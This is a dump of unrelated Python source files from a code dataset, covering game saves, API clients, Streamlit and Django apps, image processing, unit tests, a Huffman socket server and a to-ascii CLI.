run_gem5_instance(run, os.getcwd(),)\n\n","sub_path":"launch-scripts/launch_gapbs_gem5_20.py","file_name":"launch_gapbs_gem5_20.py","file_ext":"py","file_size_in_byte":6127,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"99845288","text":"import os, shutil, glob, re\nfrom datetime import datetime\nimport threading\n\ntry:\n import cPickle as pickle\nexcept ImportError:\n import pickle\n\nfrom app.utilities import str_utils\nfrom app.data.database import DB\n\nimport app.engine.config as cf\nfrom app.engine.objects.item import ItemObject\nfrom app.engine.objects.skill import SkillObject\n\nimport logging\nlogger = logging.getLogger(__name__)\n\nSAVE_THREAD = None\nGAME_NID = str(DB.constants.value('game_nid'))\nSUSPEND_LOC = 'saves/' + GAME_NID + '-suspend.pmeta'\n\nclass SaveSlot():\n no_name = '--NO DATA--'\n\n def __init__(self, metadata_fn, idx):\n self.name = self.no_name\n self.playtime = 0\n self.realtime = 0\n self.kind = None # Prep, Base, Suspend, Battle, Start\n self.mode = None\n self.idx = idx\n\n self.meta_loc = metadata_fn\n self.save_loc = metadata_fn[:-4]\n\n self.read()\n\n def read(self):\n if os.path.exists(self.meta_loc):\n with open(self.meta_loc, 'rb') as fp:\n save_metadata = pickle.load(fp)\n self.name = save_metadata['level_title']\n self.playtime = save_metadata['playtime']\n self.realtime = save_metadata['realtime']\n self.kind = save_metadata['kind']\n self.mode = save_metadata.get('mode')\n\n def get_name(self):\n if self.kind == 'turn_change':\n turn = int(re.findall(r'\\d+', self.meta_loc)[-1])\n return self.name + (' - Turn %d' % turn)\n elif self.kind:\n return self.name + ' - ' + self.kind\n else:\n return self.name\n\n def __repr__(self):\n return '%d: %s' % (self.idx, self.get_name())\n\ndef dict_print(d):\n for k, v in d.items():\n if isinstance(v, dict):\n dict_print(v)\n else:\n print(\"{0} : {1}\".format(k, v))\n\ndef save_io(s_dict, meta_dict, old_slot, slot, force_loc=None, name=None):\n if name:\n save_loc = 'saves/' + name + '.p'\n elif force_loc:\n save_loc = 'saves/' + GAME_NID + '-' + force_loc + '.p'\n elif slot is not None:\n save_loc = 'saves/' + GAME_NID + '-' + str(slot) + '.p'\n meta_loc = save_loc + 'meta'\n\n logger.info(\"Saving to %s\", save_loc)\n\n with open(save_loc, 'wb') as fp:\n # pickle.dump(s_dict, fp, -1)\n try:\n pickle.dump(s_dict, fp)\n except TypeError as e:\n # There's a surface somewhere in the dictionary of things to save...\n dict_print(s_dict)\n print(e)\n with open(meta_loc, 'wb') as fp:\n pickle.dump(meta_dict, fp)\n\n # For restart\n if not force_loc:\n r_save = 'saves/' + GAME_NID + '-restart' + str(slot) + '.p'\n r_save_meta = r_save + 'meta'\n # If the slot I'm overwriting is a start of map\n # Then rename it to restart file\n if meta_dict['kind'] == 'start':\n if save_loc != r_save:\n shutil.copy(save_loc, r_save)\n shutil.copy(meta_loc, r_save_meta)\n elif old_slot is not None:\n old_name = 'saves/' + GAME_NID + '-restart' + str(old_slot) + '.p'\n old_name_meta = old_name + 'meta'\n if old_name != r_save:\n shutil.copy(old_name, r_save)\n shutil.copy(old_name_meta, r_save_meta)\n\n # For preload\n if meta_dict['kind'] == 'start':\n preload_saves = glob.glob('saves/' + GAME_NID + '-preload-' + str(meta_dict['level_nid']) + '-*.p')\n nids = [p.split('-')[-1][:-2] for p in preload_saves]\n unique_nid = str(str_utils.get_next_int('0', nids))\n preload_save = 'saves/' + GAME_NID + '-preload-' + str(meta_dict['level_nid']) + '-' + unique_nid + '.p'\n preload_save_meta = 'saves/' + GAME_NID + '-preload-' + str(meta_dict['level_nid']) + '-' + unique_nid + '.pmeta'\n\n shutil.copy(save_loc, preload_save)\n shutil.copy(meta_loc, preload_save_meta)\n\ndef suspend_game(game_state, kind, slot=None, name=None):\n \"\"\"\n Saves game state to file\n \"\"\"\n logging.debug(\"Suspending game...\")\n s_dict, meta_dict = game_state.save()\n logging.debug(\"Suspend state: %s\", game_state.state.state_names())\n logging.debug(\"Suspend temp state: %s\", game_state.state.temp_state)\n meta_dict['kind'] = kind\n meta_dict['time'] = datetime.now()\n if game_state.current_save_slot:\n current_save_slot = game_state.current_save_slot.idx\n else:\n current_save_slot = None\n\n if kind == 'suspend':\n force_loc = 'suspend'\n else:\n force_loc = None\n\n global SAVE_THREAD\n SAVE_THREAD = threading.Thread(target=save_io, args=(s_dict, meta_dict, current_save_slot, slot, force_loc, name))\n SAVE_THREAD.start()\n\ndef load_game(game_state, save_slot):\n \"\"\"\n Load game state from file\n \"\"\"\n save_loc = save_slot.save_loc\n logging.info(\"Loading from %s\", save_loc)\n with open(save_loc, 'rb') as fp:\n s_dict = pickle.load(fp)\n game_state.build_new()\n game_state.load(s_dict)\n game_state.current_save_slot = save_slot\n\n set_next_uids(game_state)\n\ndef set_next_uids(game_state):\n if game_state.item_registry:\n ItemObject.next_uid = max(game_state.item_registry.keys()) + 1\n else:\n ItemObject.next_uid = 100\n if game_state.skill_registry:\n SkillObject.next_uid = max(game_state.skill_registry.keys()) + 1\n else:\n SkillObject.next_uid = 100\n logging.info(\"Setting next item uid: %d\" % ItemObject.next_uid)\n logging.info(\"Setting next skill uid: %d\" % SkillObject.next_uid)\n\ndef load_saves():\n save_slots = []\n for num in range(0, int(DB.constants.value('num_save_slots'))):\n meta_fp = 'saves/' + GAME_NID + '-' + str(num) + '.pmeta'\n ss = SaveSlot(meta_fp, num)\n save_slots.append(ss)\n return save_slots\n\ndef load_restarts():\n save_slots = []\n for num in range(0, int(DB.constants.value('num_save_slots'))):\n meta_fp = 'saves/' + GAME_NID + '-restart' + str(num) + '.pmeta'\n ss = SaveSlot(meta_fp, num)\n save_slots.append(ss)\n return save_slots\n\ndef get_all_saves():\n \"\"\"\n Grabs all the turn_change saves\n \"\"\"\n save_slots = []\n name = 'saves/' + GAME_NID + '-turn_change-*-*.pmeta'\n for meta_fn in glob.glob(name):\n ss = SaveSlot(meta_fn, 0)\n save_slots.append(ss)\n save_slots = sorted(save_slots, key=lambda x: x.realtime, reverse=True)\n return save_slots\n\ndef remove_suspend():\n if not cf.SETTINGS['debug'] and os.path.exists(SUSPEND_LOC):\n os.remove(SUSPEND_LOC)\n\ndef get_save_title(save_slots):\n options = [save_slot.get_name() for save_slot in save_slots]\n colors = [DB.difficulty_modes.get(save_slot.mode).color if save_slot.mode else 'green' for save_slot in save_slots]\n return options, colors\n\ndef check_save_slots():\n global SAVE_SLOTS, RESTART_SLOTS\n SAVE_SLOTS = load_saves()\n RESTART_SLOTS = load_restarts()\n\nSAVE_SLOTS = load_saves()\nRESTART_SLOTS = load_restarts()\n","sub_path":"app/engine/save.py","file_name":"save.py","file_ext":"py","file_size_in_byte":6999,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"551856691","text":"# Licensed under a 3-clause BSD style license - see LICENSE.rst\nfrom __future__ import division\n\nimport os\nimport tempfile\nimport json\nimport tables\nimport shutil\nimport logging\nfrom glob import glob\nimport numpy as np\n\nimport Ska.DBI\n\nimport mica.archive.asp_l1 as asp_l1_arch\nimport mica.archive.obspar as obspar_arch\nfrom mica.archive import obsid_archive\nfrom .core import Obi, VV_VERSION\nfrom .vv import FILES\n\n\nVV_DTYPE = np.dtype(\n [('obsid', ' FireflyResponse:\n \"\"\"\n Gets the wisdoms list for the user with the demo wisdoms can filter with search_term.\n\n Args:\n api_key (Optional[str]): Explicit `api_key`, not required, if `Whatify.login()` was run prior.\n search_term (Optional[str]): the search term you want to filter\n :return:\n FireflyResponse: Contains mapping of wisdoms for the user.\n \"\"\"\n requestor = APIRequestor()\n # filter_ = None\n # sort = None\n # page = None\n # page_size = None\n\n # url = '{prefix}/with_demo'.format(prefix=cls._CLASS_PREFIX)\n # # url = '{prefix}'.format(prefix=cls._CLASS_PREFIX)\n # # filters = requestor.parse_filter_parameters(filter_)\n # filters = requestor.parse_filter_parameters(filter_={'name': [search_term]})\n # sorts = requestor.parse_sort_parameters(sort)\n # params = {'search_all_columns': search_term,\n # 'page': page, 'page_size': page_size,\n # 'sort': sorts, 'filter': filters\n # }\n #\n # response = requestor.get(url=url if url else cls.class_url(), params=params, api_key=api_key)\n\n url = '{prefix}/with_demo'.format(prefix=cls._CLASS_PREFIX)\n response = requestor.get(url, api_key=api_key)['hits']\n if search_term:\n response = [d for d in response if str(d['name']).find(search_term) != -1]\n return response\n\n @classmethod\n def get_suggest_wisdom_list(cls, search_term: str = None, api_key: str = None) -> FireflyResponse:\n \"\"\"\n Gets the suggest wisdoms list for the user can filter with search_term.\n\n Args:\n api_key (Optional[str]): Explicit `api_key`, not required, if `Whatify.login()` was run prior.\n search_term (Optional[str]): the search term you want to filter\n :return:\n FireflyResponse: Contains mapping of suggest wisdoms for the user.\n \"\"\"\n requestor = APIRequestor()\n url = 'suggestions'\n response = requestor.get(url, api_key=api_key)['result']\n if search_term:\n response = [d for d in response if str(d['name']).find(search_term) != -1]\n return response\n\n @classmethod\n def get_wisdom(cls, id: int, api_key: str = None) -> FireflyResponse:\n \"\"\"\n Gets the wisdom data for the user by its ID\n\n Args:\n id (int): wisdom (foresight) ID.\n api_key (Optional[str]): Explicit `api_key`, not required, if `Whatify.login()` was run prior.\n\n Returns:\n FireflyResponse: Contains wisdom data by ID for the user.\n \"\"\"\n requestor = APIRequestor()\n url = '{prefix}/{id}'.format(prefix=cls._CLASS_PREFIX, id=id)\n response = requestor.get(url, api_key=api_key)\n return response\n\n @classmethod\n def delete_wisdom(cls, id: int, api_key: str = None) -> FireflyResponse:\n \"\"\"\n Deletes a specific Wisdom.\n\n Args:\n id (int): Wisdom ID.\n api_key (Optional[str]): Explicit `api_key`, not required, if `Whatify.login()` was run prior.\n\n Returns:\n FireflyResponse: \"true\" if deleted successfuly, raises WhtifyClientError otherwise.\n \"\"\"\n return cls._delete(id, api_key)\n\n @classmethod\n def create_wisdom(cls, name: str, user_id: int, template_id: int, user_input: str, status: str = None,\n email_client: str = None, is_internal_user: bool = None, foresight_limit: int = None,\n producer: str = None, user_context: str = None, users_in_account: str = None,\n logger: str = None, api_key: str = None) -> FireflyResponse:\n \"\"\"\n Create Wisdom for current user\n\n :param name:\n :param user_id:\n :param template_id:\n :param user_input:\n :return:\n FireflyResponse: Wisdom ID, if successful\n \"\"\"\n data = {\n \"name\": name,\n \"user_input\": json.dumps(user_input),\n \"user_id\": user_id,\n \"template_id\": template_id\n }\n\n requestor = APIRequestor()\n response = requestor.post(url=cls._CLASS_PREFIX, params=data, api_key=api_key)\n # response = requestor.post(url=cls._CLASS_PREFIX, body=data, api_key=api_key)\n return response['id']\n\n @classmethod\n def update_wisdom(cls, id: int, data: str, api_key: str = None) -> FireflyResponse:\n \"\"\"\n update wisdom by given data\n\n :param id:\n :param data:\n :param api_key:\n :return:\n \"\"\"\n\n requestor = APIRequestor()\n url = '{prefix}/{id}'.format(prefix=cls._CLASS_PREFIX, id=id)\n response = requestor.patch(url=url, params=data, api_key=api_key)\n return response\n\n\n\n","sub_path":"fireflyai/resources/wisdom.py","file_name":"wisdom.py","file_ext":"py","file_size_in_byte":5611,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"23812722","text":"# # https://docs.streamlit.io/library/get-started/create-an-app\n\n# import streamlit as st\n# import pandas as pd\n# import numpy as np\n\n# st.title('Uber pickups in NYC')\n\n\n# DATE_COLUMN = 'date/time'\n# DATA_URL = ('https://s3-us-west-2.amazonaws.com/'\n# 'streamlit-demo-data/uber-raw-data-sep14.csv.gz')\n\n# def load_data(nrows):\n# data = pd.read_csv(DATA_URL, nrows=nrows)\n# lowercase = lambda x: str(x).lower()\n# data.rename(lowercase, axis='columns', inplace=True)\n# data[DATE_COLUMN] = pd.to_datetime(data[DATE_COLUMN])\n# return data\n\n# # Create a text element and let the reader know the data is loading.\n# data_load_state = st.text('Loading data...')\n# # Load 10,000 rows of data into the dataframe.\n# data = load_data(10000)\n# # Notify the reader that the data was successfully loaded.\n# data_load_state.text('Loading data...done!')\n\n\nfrom vega_datasets import data\nimport streamlit as st\nimport altair as alt\n\ndef main():\n df = load_data()\n page = st.sidebar.selectbox(\"Choose a page\", [\"Homepage\", \"Exploration\"])\n\n if page == \"Homepage\":\n st.header(\"This is your data explorer.\")\n st.write(\"Please select a page on the left.\")\n st.write(df)\n elif page == \"Exploration\":\n st.title(\"Data Exploration\")\n x_axis = st.selectbox(\"Choose a variable for the x-axis\", df.columns, index=3)\n y_axis = st.selectbox(\"Choose a variable for the y-axis\", df.columns, index=4)\n visualize_data(df, x_axis, y_axis)\n\n@st.cache\ndef load_data():\n df = data.cars()\n return df\n\ndef visualize_data(df, x_axis, y_axis):\n graph = alt.Chart(df).mark_circle(size=60).encode(\n x=x_axis,\n y=y_axis,\n color='Origin',\n tooltip=['Name', 'Origin', 'Horsepower', 'Miles_per_Gallon']\n ).interactive()\n\n st.write(graph)\n\nif __name__ == \"__main__\":\n main()","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1860,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"460333854","text":"#modell.py\n\nimport uuid\n\nclass Modell:\n\tdef __init__(self, controller):\n\t\tself.controller = controller\n\t\t\n\t\tself.items = dict()\n\n\t\tself.items[uuid.uuid4()] = \"krasser\"\n\t\tself.items[uuid.uuid4()] = \"shit\"\n\t\tself.items[uuid.uuid4()] = \"mehr noch...\"\n\t\t\n\t\tkey_list = list(self.items.keys())\n\t\tself.root = Node(\"root_node\", key_list[0])\t\t\n\t\tself.root.add_child(Node(\"child1\", key_list[1]))\n\t\tself.root.add_child(Node(\"child2=child1\", key_list[1]))\n\t\tself.root.add_child(Node(\"alter\", key_list[2]))\n\t\ttt = self.root.add_child(Node(\"4rl-o'rly?\", key_list[2]))\n\t\ttt.add_child(Node(\"haya\", key_list[0]))\n\n\tdef get_root(self):\n\t\treturn self.root\n\t\t\n\tdef get_text(self, item):\n\t\tif item:\n\t\t\tfound_item = None\n\t\t\tfound_item = self.root.find_child(item)\n\n\t\t\tif found_item:\n\t\t\t\treturn str(self.items[found_item.data])\n\n\t\treturn None\n\n\tdef set_text(self, item, text):\n\t\tif item:\n\t\t\tfound_item = None\n\t\t\tfound_item = self.root.find_child(item)\n\n\t\t\tif found_item:\n\t\t\t\tself.items[found_item.data] = text\n\nclass Node:\n\tdef __init__(self, name, data):\n\t\tself.uid = uuid.uuid4()\n\t\tself.children = list()\n\t\tself.name = name\n\t\tself.data = data\n\t\n\tdef add_child(self, child_node):\n\t\tself.children.append(child_node)\n\t\tprint(self.name, \"is now parent of\", child_node.name)\n\t\treturn child_node\n\n\tdef find_child(self, uid):\n\t\tif self.uid == uid:\n\t\t\treturn self\n\t\t\n\t\tchild_found = None\n\t\t\n\t\tfor child in self.children:\n\t\t\tchild_found = child.find_child(uid)\n\t\t\t\n\t\t\tif child_found:\n\t\t\t\treturn child_found\n\t\t\t\t\n\t\treturn None\n\t\t\n","sub_path":"modell.py","file_name":"modell.py","file_ext":"py","file_size_in_byte":1501,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"219279755","text":"\"\"\"attendance URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/2.0/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.contrib import admin\nfrom django.urls import path\nfrom django.conf import settings\nfrom django.conf.urls.static import static\nimport diary.views as dry \n\nadmin.site.site_title = 'Attendance Admin'\nadmin.site.site_header = 'Attendance Management System'\nadmin.site.index_title = 'Attendance Administration'\n\nurlpatterns = [\n path('admin/', admin.site.urls),\n path('', dry.home),\n path('student-stats/', dry.StatbyRoll),\n path('paper-stats/', dry.StatByPaper),\n path('student/', dry.StatStudent),\n path('paper/', dry.StatPaper),\n path('datestat/', dry.statbyDate),\n path('allstat/', dry.statAll),\n] + static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)","sub_path":"attendance/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1348,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"254699786","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat May 2 14:41:11 2020\n\n@author: jiaqiwang0301@win.tu-berlin.de\n\"\"\"\n\nimport numpy as np\nimport utils.training_crack as train_utils\nfrom sklearn.metrics import confusion_matrix\nimport cv2\nimport matplotlib.pyplot as plt\nfrom PIL import Image\n\ndef calculate_confusion_matrix(targets,preds,cls_num,t=5):\n '''\n claculate confusion matrix for only two class!!!!\n !!! for batch..it also works..I think\n input:\n targets: tensor ground truth\n preds: tensor predicted value\n t: tolerance margin\n '''\n pre = preds\n gt = targets\n# targets = targets.data.cpu().numpy().flatten('C')\n# preds = preds.data.cpu().numpy().flatten('C')\n \n c_matrix = confusion_matrix(gt.flatten('C'), pre.flatten('C'),labels=np.arange(cls_num))\n b,w,h = gt.shape\n r = []\n for k in range(b):\n num = 0\n for i in range(w):\n for j in range(h):\n if pre[k,i,j] == 1 :\n c = gt[k,max(0,i-t):min(w,i+t+1),max(0,j-t):min(h,j+t+1)]\n if c[c==1].sum() > 1:\n num += 1\n r.append(num)\n \n c_matrix[0,1] = c_matrix[0,1] - (sum(r) - c_matrix[1,1])\n c_matrix[1,1] = sum(r)\n\n return c_matrix\n\ntargets = (np.load('output/ts.npy')[0,:,:])\npreds = (np.load('output/pred.npy')[0,:,:])/5\n\n\nt = 5 # tolerance margin\ndef generation_TP_FP_FN(targets,preds,t = 5):\n TP = np.zeros_like(targets)\n FP = np.zeros_like(targets)\n FN = np.zeros_like(targets)\n w,h = preds.shape\n for i in range(w):\n for j in range(h):\n if preds[i,j] == 1 :\n \n c = targets[max(0,i-t):min(w,i+t+1),max(0,j-t):min(h,j+t+1)]\n if c[c==1].sum() > 1:\n TP[i,j] = 1\n else:\n FP[i,j] = 1\n else:\n if targets[i,j] == 1:\n FN[i,j] = 1\n return TP, FP, FN\n\n#cm = calculate_confusion_matrix(targets[None,:,:],preds[None,:,:],2,t=5)\n#print(cm)\n\nTP, FP, FN = generation_TP_FP_FN(targets,preds,t = 5)\nprint(TP.sum(),FP.sum(),FN.sum())\nw, h = FN.shape\nimg = np.ones([w,h,3])*255\ndef draw_color(img,TP,color):\n ind = TP==1\n img1 = img[:,:,0]\n img2 = img[:,:,1]\n img3 = img[:,:,2]\n img1[ind] = color[0]\n img2[ind] = color[1]\n img3[ind] = color[2]\n return np.stack((img1,img2,img3),axis=-1)\n\nimg = draw_color(img,TP,[255,0,0])\nimg = draw_color(img,FP,[0,255,0])\nimg = draw_color(img,FN,[0,0,255])\n\npath = 'SegNet-Tutorial/CamVid/CFD/aug/aug2_180/images/112.jpg'\nimage_original = np.array(Image.open(path)).astype(np.float32)\n\nw_img = 0.8\nw_label = 0.2 \nimg = img.astype(np.float32) \nimage_merged = cv2.addWeighted(image_original,w_img,img,w_label,0,dtype = cv2.CV_32F) \n\nplt.figure()\nplt.imshow(img) \n \n\n \n\n \n\n\n","sub_path":"utils/previous/color_test_delete_later.py","file_name":"color_test_delete_later.py","file_ext":"py","file_size_in_byte":2877,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"631435000","text":"import numpy as np\nimport unittest\nfrom py.py import PyCUMSUM, cumsum\nfrom cpp.cpp import CppCUMSUM\nfrom R.R import RCUMSUM\n#\"\"\"\n\n\nclass TestPyCUMSUM(unittest.TestCase):\n def test_intsample(self):\n seq = [1, 2, 3, 4, 5]\n ex = [1, 3, 6, 10, 15]\n PyC = PyCUMSUM(seq)\n self.assertEqual(ex, PyC.cumsum)\n self.assertEqual(ex, cumsum(seq))\n\n def test_np(self):\n r = np.random.RandomState(0)\n cases = 10\n length = 100\n for dummy_iterator in range(cases):\n seq = r.randn(length)\n PyC = PyCUMSUM(seq)\n NpC = np.cumsum(seq)\n pyc = cumsum(seq)\n for Py, py, Np in zip(PyC.cumsum, pyc, NpC):\n self.assertAlmostEqual(Np, Py, places=10)\n self.assertAlmostEqual(Np, py, places=10)\n\n def test_cpp(self):\n r = np.random.RandomState(0)\n cases = 10\n length = 100\n for dummy_iterator in range(cases):\n seq = r.randn(length)\n PyC = PyCUMSUM(seq)\n CppC = CppCUMSUM(seq)\n pyc = cumsum(seq)\n for Py, py, Cpp in zip(PyC.cumsum, pyc, CppC.cumsum):\n self.assertAlmostEqual(Cpp, Py, places=10)\n self.assertAlmostEqual(Cpp, py, places=10)\n\n def test_R(self):\n r = np.random.RandomState(0)\n cases = 10\n length = 100\n for dummy_iterator in range(cases):\n seq = r.randn(length)\n PyC = PyCUMSUM(seq)\n RC = RCUMSUM(seq)\n pyc = cumsum(seq)\n for Py, py, R in zip(PyC.cumsum, pyc, RC.cumsum):\n self.assertAlmostEqual(R, Py, places=10)\n self.assertAlmostEqual(R, py, places=10)\n\n\nclass TestCppCUMSUM(unittest.TestCase):\n def test_intsample(self):\n seq = [1, 2, 3, 4, 5]\n ex = [1, 3, 6, 10, 15]\n CppC = CppCUMSUM(seq)\n self.assertEqual(ex, CppC.cumsum)\n\n def test_npcumsum(self):\n cases = 10\n length = 100\n r = np.random.RandomState(0)\n for dummy_iterator in range(cases):\n seq = r.randn(length)\n CppC = PyCUMSUM(seq)\n NpC = np.cumsum(seq)\n for Cpp, Np in zip(CppC.cumsum, NpC):\n self.assertAlmostEqual(Np, Cpp, places=10)\n\n\nclass TestRCUMSUM(unittest.TestCase):\n def test_intsample(self):\n seq = [1, 2, 3, 4, 5]\n ex = [1, 3, 6, 10, 15]\n RC = RCUMSUM(seq)\n self.assertEqual(ex, RC.cumsum)\n\n def test_npcumsum(self):\n cases = 10\n length = 100\n r = np.random.RandomState(0)\n for dummy_iterator in range(cases):\n seq = r.randn(length)\n RC = RCUMSUM(seq)\n NpC = np.cumsum(seq)\n for R, Np in zip(RC.cumsum, NpC):\n self.assertAlmostEqual(Np, R, places=10)\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"Unittest.py","file_name":"Unittest.py","file_ext":"py","file_size_in_byte":2887,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"435863565","text":"import socket\nimport huffman\n\nPORT=9009\nIP=''\nconn=(IP,PORT)\n\nif __name__ == \"__main__\":\n\n\ts=socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\ts.bind(conn)\n\ts.listen(5)\n\tc,addr=s.accept()\n\n\tfilename=c.recv(10).decode(\"utf-8\")\n\ttry:\n\t\tfile=open(filename,\"rb\")\n\texcept FileNotFoundError:\n\t\tprint(\"file '%s' not found\"%filename)\n\t\tc.send(\"0\".encode(\"utf-8\"))\n\t\tquit()\n\tc.send(\"1\".encode(\"utf-8\"))\n\tfile.close()\n\n\thuff=huffman.Huffman(filename)\n\thuff.encode(\"a.huff\")\n\n\tfile=open(\"a.huff\",\"rb\")\n\tdata=file.read(1024)\n\twhile data:\n\t\tc.send(data)\n\t\tdata=file.read(1024) \n\tc.send(data)\n\n\tfile.close()\n\tc.close()","sub_path":"huffman/variable_length/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":607,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"364537546","text":"import os\n\nimport gensim.downloader as api\nfrom gensim.models import Word2Vec, KeyedVectors\n\nif __name__ == '__main__':\n bin_file_path = 'data/text8-word2vec.bin'\n\n if not os.path.exists(bin_file_path):\n dataset = api.load('text8')\n model = Word2Vec(dataset)\n os.makedirs('data', exist_ok=True)\n model.save(bin_file_path)\n\n model = KeyedVectors.load(bin_file_path)\n\n vec_song = model.wv['song']\n print(vec_song)\n vec_song_2 = model.wv.word_vec('song')\n print(vec_song_2)\n","sub_path":"2020/09/20200905_Word2Vec_word_vector/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":520,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"600644152","text":"\ndef main():\n import argparse\n\n from .Image import Image\n from .Video import Video\n from .Live import Live\n\n parser = argparse.ArgumentParser(\n prog='to-ascii',\n description='A tool which can convert videos, images, gifs, and even live video to ascii art!'\n )\n\n # cli args\n parser.add_argument('-t', '--type', type=str, choices=['image', 'video', 'live'], dest='filetype', help='The type of file', action='store', required=True)\n parser.add_argument('-f', '--file', type=str, dest='filename', help='The name of the file to convert', action='store', required=True)\n parser.add_argument('-s', '--scale', type=float, dest='scale', default=.1, help='The scale of the final dimensions', action='store')\n parser.add_argument('-w', '--width-stretch', type=float, dest='width_stretch', default=2, help='Scale which only applies to the width', action='store')\n parser.add_argument('-g', '--gradient', type=str, dest='gradient', default='0', help='The gradient pattern which will be used', action='store')\n parser.add_argument('-r', '--fps', type=int, dest='fps', default=30, help='The FPS cap which will be used when viewing video and live video', action='store')\n\n args = parser.parse_args()\n\n try: # attempt to make gradient an integer if the gradient was supposed to be an index\n args.gradient = int(args.gradient)\n except ValueError:\n pass\n\n if args.filetype == 'live':\n try:\n source = int(args.filename)\n except ValueError:\n source = 0\n\n l = Live(source, scale=args.scale, w_stretch=args.width_stretch, gradient=args.gradient, fps=args.fps, verbose=True)\n\n try:\n l.view()\n except KeyboardInterrupt:\n return\n except Exception as e:\n print(f'ERROR (Please report this!): {e}')\n return\n return\n\n elif args.filetype == 'video':\n c = Video(args.filename, scale=args.scale, w_stretch=args.width_stretch, gradient=args.gradient, verbose=True)\n else:\n c = Image(args.filename, scale=args.scale, w_stretch=args.width_stretch, gradient=args.gradient, verbose=True)\n\n try:\n c.convert()\n if args.filetype == 'video':\n c.view(args.fps)\n else:\n c.view()\n except KeyboardInterrupt:\n print('Exiting...')\n\nif __name__ == '__main__':\n main()\n","sub_path":"toascii/CLI.py","file_name":"CLI.py","file_ext":"py","file_size_in_byte":2394,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"184016980","text":"#####INCLUDE PATHS\n#####################################\ndef makeIncludePathsList():\n\tinclude_paths_list = [\n\t'#',\n\t'boost_include_path',\n\t'opencl_include_path']\n\treturn include_paths_list\n#################################\n\n#LIBRARIES - ADJUST NAMES\n#################################\ndef makeLibsNamesList():\n\tlib_names_list = [\n\t'boost_program_options',\n\t'boost_filesystem', \n\t'boost_system', \n\t'boost_unit_test_framework',\n\t'OpenCL']\n\treturn lib_names_list\n#################################\n#LIBRARIES - ADJUST PATHS\n#################################\ndef makeLibPathList():\n\tlib_path_list = [\n\t'boost_lib_path', \n\t'opencl_lib_path']\n\treturn lib_path_list\n#####################################\n####\n###SOURCEFILES\n##########################\ndef programSources():\n\tsource_files = [\n\t'main.cpp', \n\t'EnvCL2.cpp',\n\t'ExternalProgram.cpp',\n\t'FileIn.cpp',\n\t'FileOut.cpp',\n\t'Config.cpp',\n 'DataProxy.cpp']\n\treturn source_files\n\t\ndef testSources():\n\tsource_files = [\n\t'main_test.cpp', \n\t'Config.cpp']\n\treturn source_files\n#SOURCEFILES\n######################\n\n####################################\n##EXAMPLE - FEDORA PC Libraries linkage paths\n##JAKUB KUREK\n###INCLUDE PATHS\n###################################\n#def makeIncludePathsList():\n#\tinclude_paths_list = [\n#\t'#',\n#\t'/usr/local/include',\n#\t'/usr/local/cuda/include']\n#\treturn include_paths_list\n###################################\n\n###LIBRARIES - ADJUST NAMES\n###################################\n#def makeLibsNamesList():\n#\tlib_names_list = [\n#\t'boost_program_options',\n#\t'boost_filesystem', \n#\t'boost_system', \n#\t'boost_unit_test_framework',\n#\t'OpenCL']\n#\treturn lib_names_list\n###################################\n\n###LIBRARIES - ADJUST PATHS\n###################################\n#def makeLibPathList():\n#\tlib_path_list = [\n#\t'/usr/local/lib', \n#\t'/user/lib']\n#\treturn lib_path_list\n###################################\n\n##################################\n##EXAMPLE - WINDOWS 10 PC Libraries linkage paths\n##JAKUB KUREK\n\n##INCLUDE PATHS\n###########################\n##def makeIncludePathsList():\n## include_paths_list = [\n## '#',\n## 'E:\\\\BibliotekiProgramistyczne\\\\Cpp\\\\boost_1_62_0',\n## 'E:\\\\BibliotekiProgramistyczne\\\\CUDA\\\\Toolkit\\\\include']\n## return include_paths_list\n#################################\n##\n####LIBRARIES - ADJUST NAMES\n#################################\n##def makeLibsNamesList():\n## lib_names_list = [\n## 'boost_program_options-vc140-mt-1_62.lib',\n## 'boost_filesystem-vc140-mt-1_62.lib', \n## 'boost_system-vc140-mt-1_62.lib', \n## 'boost_unit_test_framework-vc140-mt-1_62.lib',\n##\t\t'OpenCL.lib'\n##\t\t]\n## return lib_names_list\n#################################\n##\n####LIBRARIES - ADJUST PATHS\n#################################\n##def makeLibPathList():\n## lib_path_list = [\n## 'E:\\\\BibliotekiProgramistyczne\\\\Cpp\\\\boost_1_62_0\\\\lib64-msvc-14.0', \n## 'E:\\\\BibliotekiProgramistyczne\\\\CUDA\\\\Toolkit\\\\lib\\\\x64']\n## return lib_path_list\n###############################\n","sub_path":"libpaths.py","file_name":"libpaths.py","file_ext":"py","file_size_in_byte":3041,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"557549671","text":"import 